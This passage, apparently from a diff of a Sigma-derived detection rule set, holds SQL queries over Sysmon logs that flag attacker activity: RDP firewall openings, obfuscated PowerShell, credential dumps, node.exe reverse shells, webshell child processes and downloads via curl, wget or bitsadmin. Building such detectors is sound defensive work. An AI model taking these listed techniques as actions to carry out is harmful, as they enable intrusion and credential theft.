], - "filename": "proc_creation_win_lolbin_dump64.yml" + "filename": "proc_creation_win_whoami_susp_flags.yml" }, { - "title": "RDP Connection Allowed Via Netsh.EXE", - "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "title": "Copy from Admin Share", + "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", "status": "test", - "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", - "author": "Sander Wiebing", + "description": "Detects a suspicious copy command to or from an Admin share or remote", + "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.lateral_movement", + "attack.collection", + "attack.exfiltration", + "attack.t1039", + "attack.t1048", + "attack.t1021.002" ], "falsepositives": [ - "Legitimate administration activity" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((Image LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((Image LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" + "filename": "proc_creation_win_susp_copy_lateral_movement.yml" }, { - "title": "APT29 2018 Phishing Campaign CommandLine Indicators", - "id": "7453575c-a747-40b9-839b-125a0aae324b", + "title": "Suspicious Double Extension File Execution", + "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "Florian Roth (Nextron Systems), @41thexplorer", + "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", + "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%-noni -ep bypass $%' ESCAPE '\\' OR (CommandLine LIKE '%cyzfc.dat,%' ESCAPE '\\' AND CommandLine LIKE '%PointFunctionCall%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%.doc.exe' ESCAPE '\\' OR Image LIKE '%.docx.exe' ESCAPE '\\' OR Image LIKE '%.xls.exe' ESCAPE '\\' OR Image LIKE '%.xlsx.exe' ESCAPE '\\' OR Image LIKE '%.ppt.exe' ESCAPE '\\' OR Image LIKE '%.pptx.exe' ESCAPE '\\' OR Image LIKE '%.rtf.exe' ESCAPE '\\' OR Image LIKE '%.pdf.exe' ESCAPE '\\' OR Image LIKE '%.txt.exe' ESCAPE '\\' OR Image LIKE '% .exe' ESCAPE '\\' OR Image LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR Image LIKE '%.doc.js' ESCAPE '\\' OR Image LIKE '%.docx.js' ESCAPE '\\' OR Image LIKE '%.xls.js' ESCAPE '\\' OR Image LIKE '%.xlsx.js' ESCAPE '\\' OR Image LIKE '%.ppt.js' ESCAPE '\\' OR Image LIKE '%.pptx.js' ESCAPE '\\' OR Image LIKE '%.rtf.js' ESCAPE '\\' OR Image LIKE '%.pdf.js' ESCAPE '\\' OR Image LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt29_phishing_campaign_indicators.yml" + "filename": "proc_creation_win_susp_double_extension.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation", - "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", - "status": "test", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Service DACL Abuse To Hide Services Via Sc.EXE", + "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", + "status": "experimental", + "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" + "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" }, { - "title": "Boot Configuration Tampering Via Bcdedit.EXE", - "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", - "status": "stable", - "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Disable Windows IIS HTTP Logging", + "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", + "status": "experimental", + "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", + "author": "frack113", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" + "filename": "proc_creation_win_iis_appcmd_http_logging.yml" }, { - "title": "Droppers Exploiting CVE-2017-11882", - "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "title": "Potential CVE-2021-26857 Exploitation Attempt", + "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", "status": "stable", - "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.execution", + "cve.2021.26857" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((Image LIKE '%wermgr.exe' ESCAPE '\\' OR Image LIKE '%WerFault.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2017_11882.yml" + "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" }, { - "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", - "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", - "status": "test", - "description": "Detects dump of credentials in VeeamBackup dbo", - "author": "frack113", + "title": "Privilege Escalation via Named Pipe Impersonation", + "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "status": "experimental", + "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", + "author": "Tim Rauch", "tags": [ - "attack.collection", - "attack.t1005" + "attack.lateral_movement", + "attack.t1021" ], "falsepositives": [ - "Unknown" + "Other programs that cause these patterns (please report)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" + "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference", - "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", - "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Run PowerShell Script from Redirected Input Stream", + "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", + "status": "test", + "description": "Detects PowerShell script execution via input stream redirect", + "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" ], - "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" + "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" }, { - "title": "Potential Arbitrary Code Execution Via Node.EXE", - "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "title": "File Download Via Bitsadmin To A Suspicious Target Folder", + "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", "status": "experimental", - "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_node_abuse.yml" - }, - { - "title": "Suspicious Desktopimgdownldr Command", - "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", - "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" }, { - "title": "Shells Spawned by Web Servers", - "id": "8202070f-edeb-4d31-a010-a26c72ac5600", - "status": "test", - "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", - "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1190" - ], + "title": "Suspicious Download from Office Domain", + "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", + "status": "experimental", + "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ - "Particular web applications may spawn a shell process legitimately" + "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\at.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsget.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR Image LIKE '%\\\\find.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\hostname.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netdom.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\' OR Image LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\' OR Image LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\ver.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_spawn.yml" + "filename": "proc_creation_win_susp_download_office_domain.yml" }, { - "title": "Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32", - "id": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", - "status": "test", - "description": "Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Execute MSDT Via Answer File", + "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "status": "experimental", + "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1218", + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%,DllEntry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_aptc12_bluemushroom.yml" + "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" }, { - "title": "Webshell Hacking Activity Patterns", - "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "title": "PrintBrm ZIP Creation of Extraction", + "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", "status": "experimental", - "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\ldifde.exe' ESCAPE 